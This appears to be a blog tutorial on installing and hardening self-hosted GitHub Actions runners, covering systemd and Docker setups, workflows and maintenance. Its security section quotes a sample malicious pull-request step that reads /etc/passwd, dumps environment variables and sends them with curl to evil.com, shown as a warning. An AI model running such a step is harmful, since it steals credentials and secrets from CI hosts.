
How to Set Up a Self-Hosted GitHub Actions Runner 2026

Set up a self-hosted GitHub Actions runner on your own VPS in 2026. Covers registration, Docker-based runners, security hardening, and when to use one.

OSSAlt Team

TL;DR

Self-hosted GitHub Actions runners let you run CI/CD on your own hardware — saving money on GitHub Actions minutes, accessing private networks, using custom software, or getting larger machines. Setup takes ~20 minutes. Security warning: only use self-hosted runners for private repositories. A malicious pull request on a public repo could execute arbitrary code on your server.

Key Takeaways

  • GitHub Actions minutes: Free plan = 2,000 min/month, Pro = 3,000 — self-hosted runners are free and unlimited
  • When to self-host: GPU workloads, access to private databases, custom toolchains, cost savings on high-volume CI
  • When NOT to: Public repos (security risk), low-volume repos (GitHub-hosted is simpler)
  • Docker-based setup is the cleanest — ephemeral containers, isolated environments
  • Security critical: disable self-hosted runners for public repos, use job isolation, rotate tokens

Why Self-Host a Runner?

Cost

GitHub-hosted runners charge by the minute once you exceed your monthly allowance:

  • ubuntu-latest: $0.008/minute
  • windows-latest: $0.016/minute
  • macos-latest: $0.08/minute

A team running 30 minutes of tests per commit × 50 commits/day = 1,500 minutes/day = 45,000 minutes/month. At $0.008/minute, that's $360/month. A $30/month VPS running a self-hosted runner reduces that to near zero.
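The arithmetic above can be sanity-checked with a quick awk one-liner (the volumes are this section's example figures, not universal constants):

```shell
# Monthly GitHub-hosted cost at the example CI volume (ubuntu-latest rate):
awk 'BEGIN {
  mins_per_commit = 30
  commits_per_day = 50
  days_per_month  = 30
  rate            = 0.008                    # $/min, ubuntu-latest
  mins = mins_per_commit * commits_per_day * days_per_month
  printf "%d min/month -> $%.0f/month\n", mins, mins * rate
}'
```

Swap in the windows or macOS rates to see how quickly those multipliers dominate.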

Hardware and Network Access

  • GPU workloads: Run ML training/inference tests on your own GPU server
  • Private network access: Run integration tests against internal databases, services
  • Custom software: Pre-install compilers, proprietary tools, large model weights
  • Larger machines: GitHub's largest hosted runner is 64-core; your VPS can be anything

Part 1: Register a Self-Hosted Runner

Repository-Level Runner

  1. Go to your GitHub repo → Settings → Actions → Runners
  2. Click New self-hosted runner
  3. Select your OS (Linux recommended)
  4. GitHub shows you the registration commands — copy the token (valid for 1 hour)

Organization-Level Runner

  1. GitHub Org → Settings → Actions → Runners
  2. Create runner at org level → all repos in the org can use it
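Instead of copying the token from the UI, it can be fetched from the REST API; a sketch for the org-level endpoint is below (YOUR_ORG is a placeholder, and GITHUB_TOKEN must be a PAT with org admin rights):

```shell
# Fetch an org-level runner registration token (expires after 1 hour):
org="YOUR_ORG"
url="https://api.github.com/orgs/${org}/actions/runners/registration-token"
echo "POST ${url}"
if [ -n "${GITHUB_TOKEN:-}" ]; then
  curl -sX POST \
    -H "Accept: application/vnd.github+json" \
    -H "Authorization: Bearer $GITHUB_TOKEN" \
    "$url" | jq -r .token
fi
```

The repo-level equivalent swaps /orgs/ORG for /repos/OWNER/REPO, as the auto-registration script later in this guide shows.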

Part 2: Installation — Standard Method

On your VPS (Ubuntu recommended):

# Create a dedicated user for the runner (never run as root):
sudo useradd -m -s /bin/bash github-runner
sudo su - github-runner

# Create a directory for the runner:
mkdir actions-runner && cd actions-runner

# Download the latest runner (check github.com/actions/runner for latest version):
curl -o actions-runner-linux-x64-2.321.0.tar.gz -L \
  https://github.com/actions/runner/releases/download/v2.321.0/actions-runner-linux-x64-2.321.0.tar.gz

# Extract:
tar xzf ./actions-runner-linux-x64-2.321.0.tar.gz

# Configure (use the token from GitHub UI):
./config.sh \
  --url https://github.com/YOUR_ORG_OR_USER/YOUR_REPO \
  --token YOUR_REGISTRATION_TOKEN \
  --name my-vps-runner \
  --labels self-hosted,linux,x64,my-vps \
  --unattended

# Install as a systemd service:
sudo ./svc.sh install github-runner
sudo ./svc.sh start

# Verify it's running:
sudo ./svc.sh status

Your runner now appears as Online in GitHub's runner list.
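The same check works from the API if you'd rather script it (YOUR_ORG/YOUR_REPO is a placeholder; GITHUB_TOKEN needs admin access to the repo):

```shell
# List this repo's runners and their online/offline status:
repo="YOUR_ORG/YOUR_REPO"
url="https://api.github.com/repos/${repo}/actions/runners"
if [ -n "${GITHUB_TOKEN:-}" ]; then
  curl -s -H "Accept: application/vnd.github+json" \
          -H "Authorization: Bearer $GITHUB_TOKEN" \
          "$url" | jq -r '(.runners // [])[] | "\(.name)\t\(.status)"'
else
  echo "set GITHUB_TOKEN to query ${url}"
fi
```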


A Docker-based runner provides better isolation — each job runs in a fresh container. This is the production-grade approach.

docker-compose.yml

# docker-compose.yml for self-hosted runner:
version: '3.8'
services:
  github-runner:
    image: myoung34/github-runner:latest
    restart: unless-stopped
    environment:
      REPO_URL: https://github.com/YOUR_ORG/YOUR_REPO
      RUNNER_TOKEN: ${RUNNER_TOKEN}
      RUNNER_NAME: my-docker-runner
      RUNNER_WORKDIR: /tmp/github-runner
      RUNNER_SCOPE: repo           # or 'org' for org-level
      LABELS: self-hosted,linux,x64,docker
      EPHEMERAL: "true"            # Remove runner after each job (recommended)
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock  # For Docker-in-Docker
      - /tmp/github-runner:/tmp/github-runner
# Start with your registration token (from the GitHub UI or API):
RUNNER_TOKEN=your-token docker compose up -d

Security note on Docker socket mounting: Mounting /var/run/docker.sock gives the runner Docker access — equivalent to root on the host. Avoid this for untrusted contributors. For private repos with trusted teams, it's a reasonable trade-off.

Multiple Concurrent Runners

Scale to handle parallel jobs:

version: '3.8'
services:
  runner-1:
    image: myoung34/github-runner:latest
    environment: &runner-env
      REPO_URL: https://github.com/YOUR_ORG/YOUR_REPO
      RUNNER_TOKEN: ${RUNNER_TOKEN}
      RUNNER_SCOPE: org
      LABELS: self-hosted,linux,x64
      EPHEMERAL: "true"
    volumes: &runner-volumes
      - /var/run/docker.sock:/var/run/docker.sock
      - /tmp/runner-1:/tmp/github-runner

  runner-2:
    image: myoung34/github-runner:latest
    environment: *runner-env
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock
      - /tmp/runner-2:/tmp/github-runner

Part 4: Use the Runner in Workflows

Target Your Self-Hosted Runner

# .github/workflows/ci.yml
name: CI

on: [push, pull_request]

jobs:
  test:
    # Use your self-hosted runner:
    runs-on: [self-hosted, linux, x64]
    
    steps:
      - uses: actions/checkout@v4
      
      - name: Setup Node.js
        uses: actions/setup-node@v4
        with:
          node-version: '20'
          
      - name: Install dependencies
        run: npm ci
        
      - name: Run tests
        run: npm test

Fallback to GitHub-Hosted

If your self-hosted runner is offline, jobs targeting it sit queued (GitHub fails them after roughly 24 hours). There is no native fallback, but for critical workflows a matrix can run the job on both runner types (note this duplicates the work rather than truly failing over):

jobs:
  test:
    strategy:
      matrix:
        runner: [ubuntu-latest, [self-hosted, linux, my-vps]]
    runs-on: ${{ matrix.runner }}

Access Private Resources

The main reason to self-host — your runner can access internal services:

jobs:
  integration-test:
    runs-on: [self-hosted, linux]
    
    steps:
      - uses: actions/checkout@v4
      
      - name: Run integration tests
        env:
          # Your internal database — not accessible from GitHub-hosted runners
          DATABASE_URL: postgresql://user:pass@internal-db:5432/testdb
          REDIS_URL: redis://internal-redis:6379
        run: npm run test:integration

Part 5: Security Hardening

⚠️ Never Use Self-Hosted Runners for Public Repos

This is the most critical rule. A malicious PR could contain:

# Malicious workflow in a PR to a public repo:
- name: "Steal server credentials"
  run: |
    cat /etc/passwd
    env  # Print all env vars including secrets
    curl -X POST https://evil.com/exfil --data "$(env)"

For public repos: always use GitHub-hosted runners or ephemeral, isolated cloud runners.

Use Ephemeral Runners

Ephemeral runners are destroyed after each job — no state persists between jobs:

# In the config step, add --ephemeral:
./config.sh \
  --url https://github.com/YOUR_ORG/YOUR_REPO \
  --token YOUR_TOKEN \
  --ephemeral       # Runner deregisters after one job

Combined with an auto-scaling mechanism (or just multiple persistent Docker containers), this provides job isolation.
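Outside Docker, the same effect can be had with a small wrapper loop: register with --ephemeral, run one job, repeat. This is a sketch only; REPO_URL and GET_TOKEN_CMD are placeholders you must supply (GET_TOKEN_CMD stands in for however you fetch fresh registration tokens, such as the API script in Part 6):

```shell
#!/bin/bash
# ephemeral-loop.sh — re-register a one-shot runner after every job (sketch).
# Run from the actions-runner directory as the github-runner user.
while ./config.sh --ephemeral --unattended \
        --url "$REPO_URL" --token "$($GET_TOKEN_CMD)"; do
  ./run.sh || break   # --ephemeral makes run.sh exit after a single job
done
```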

Restrict Runner Labels

Create specific labels and limit which workflows can use them:

# .github/workflows/deploy.yml
jobs:
  deploy:
    # Only this specific labeled runner can run this job:
    runs-on: [self-hosted, production-deploy]
    
    # Require environment approval before running:
    environment: production

Then in GitHub repo settings: restrict the "production" environment to specific branches/users, requiring manual approval for production deployments.

Secrets Management

Never log secrets. Use GitHub's encrypted secrets:

steps:
  - name: Deploy
    env:
      DEPLOY_KEY: ${{ secrets.DEPLOY_KEY }}  # Automatically masked in logs
    run: ./deploy.sh

On the runner host, GitHub's runner agent receives secrets per job and masks registered values in the logs; any code a job executes can still read them, which is another reason runner trust and job isolation matter.


Part 6: Maintenance

Monitor Runner Status

# Check runner service status (quote the glob so the shell doesn't expand it):
sudo systemctl status 'actions.runner.*'

# View runner logs:
sudo journalctl -u 'actions.runner.*' -f

# For Docker-based:
docker compose logs -f github-runner

Update the Runner

Runners self-update automatically by default; GitHub also warns you when a runner falls behind the minimum required version. To rebuild one manually:

# Standard installation:
cd ~/actions-runner
sudo ./svc.sh stop
./config.sh remove --token YOUR_REMOVE_TOKEN  # Get from GitHub Settings
# Re-download latest and reconfigure

# Docker-based — just pull new image:
docker compose pull && docker compose up -d
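If you want the Docker image refreshed automatically, a cron entry is enough (the path and schedule below are assumptions, not part of any standard setup):

```
# crontab -e entry: pull and restart the runner image every Sunday at 04:00
0 4 * * 0 cd /opt/github-runner && docker compose pull -q && docker compose up -d
```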

Auto-Registration Script

For teams managing multiple runners, automate registration:

#!/bin/bash
# auto-register-runner.sh
GITHUB_TOKEN=$1
REPO=$2
RUNNER_NAME=${3:-$(hostname)}

# Get registration token via GitHub API:
REG_TOKEN=$(curl -sX POST \
  -H "Accept: application/vnd.github+json" \
  -H "Authorization: Bearer $GITHUB_TOKEN" \
  "https://api.github.com/repos/$REPO/actions/runners/registration-token" \
  | jq .token -r)

./config.sh \
  --url "https://github.com/$REPO" \
  --token "$REG_TOKEN" \
  --name "$RUNNER_NAME" \
  --labels "self-hosted,linux,x64" \
  --unattended \
  --ephemeral

sudo ./svc.sh install
sudo ./svc.sh start

When to Use Self-Hosted vs GitHub-Hosted

Use Case                               Recommendation
Public OSS repo                        GitHub-hosted (always)
Small private repo (< 3K min/month)    GitHub-hosted (simpler)
High-volume CI (> 5K min/month)        Self-hosted (cost)
Private network access needed          Self-hosted (only option)
GPU workloads                          Self-hosted
Custom software / large caches         Self-hosted
Security-sensitive workflows           GitHub-hosted (or ephemeral cloud runners)
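The table's thresholds can be encoded as a tiny helper for scripting the decision (the 5,000-minute break-even is this article's rule of thumb, not an official figure):

```shell
# Rule-of-thumb runner recommendation from visibility and monthly CI minutes:
recommend_runner() {
  local visibility=$1 minutes=$2
  if [ "$visibility" = "public" ]; then
    echo "github-hosted"        # never self-host for public repos
  elif [ "$minutes" -gt 5000 ]; then
    echo "self-hosted"          # volume is high enough for cost to win
  else
    echo "github-hosted"        # low volume: hosted is simpler
  fi
}

recommend_runner public 45000    # github-hosted
recommend_runner private 45000   # self-hosted
```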

More open source DevOps tools at OSSAlt.com/categories/devops.

Operational Criteria That Matter More Than Feature Checklists

Most self-hosting decisions are framed as feature comparisons, but the better question is operational fit. Can the tool be upgraded without a maintenance window that panics the team? Is configuration stored as code or trapped in a UI? Are secrets rotated cleanly? Can one engineer explain the recovery process to another in twenty minutes? These are the properties that decide whether a self-hosted service remains in production or gets abandoned after the first incident. Fancy template libraries and long integration lists help at evaluation time, but the long-term win comes from boring traits: transparent backups, predictable networking, obvious logs, and a permission model that does not require guesswork.

That is also why platform articles benefit from linking horizontally across the stack. A deployment layer does not live alone. Coolify guide is relevant whenever the real goal is reducing friction for application deploys. Dokploy guide matters when multi-node Docker or simpler PaaS ergonomics drive the decision. Gitea guide becomes part of the same conversation because source control, CI triggers, and deployment permissions are tightly coupled in practice. Treating those services as a system instead of isolated products leads to much better architecture decisions.

A Practical Adoption Path for Teams Replacing SaaS

For teams moving from SaaS, the most reliable adoption path is phased substitution. Replace one expensive or strategically sensitive service first, document the real support burden for a month, and only then expand. This does two things. First, it keeps the migration politically survivable because there is always a rollback point. Second, it turns vague arguments about self-hosting into measured trade-offs around uptime, maintenance hours, vendor lock-in, and annual spend. A good article should push readers toward that discipline rather than implying that replacing ten SaaS products in a weekend is responsible.

Another overlooked issue is platform standardization. The more heterogeneous the stack, the more hidden cost accrues in upgrades, documentation, and debugging. When two tools solve adjacent problems, teams should prefer the one that matches their existing operational model unless the feature gap is material. That is why the best self-hosting guides talk about package boundaries, reverse proxy habits, backup patterns, and team runbooks. They are not just product recommendations. They are deployment strategy.

Decision Framework for Picking the Right Fit

The simplest way to make a durable decision is to score the options against the constraints you cannot change: who will operate the system, how often it will be upgraded, whether the workload is business critical, and what kinds of failures are tolerable. That sounds obvious, but many migrations still start with screenshots and end with painful surprises around permissions, backup windows, or missing audit trails. A short written scorecard forces the trade-offs into the open. It also keeps the project grounded when stakeholders ask for new requirements halfway through rollout.

One more practical rule helps: optimize for reversibility. A good self-hosted choice preserves export paths, avoids proprietary lock-in inside the replacement itself, and can be documented well enough that another engineer could take over without archaeology. The teams that get the most value from self-hosting are not necessarily the teams with the fanciest infrastructure. They are the teams that keep their systems legible, replaceable, and easy to reason about.

Rollout Risk Controls

Rollout controls should include staged environments, tested backups, a rollback path, and ownership for upgrades. Teams moving off SaaS usually succeed when they treat each migration like a platform change instead of a casual app install.
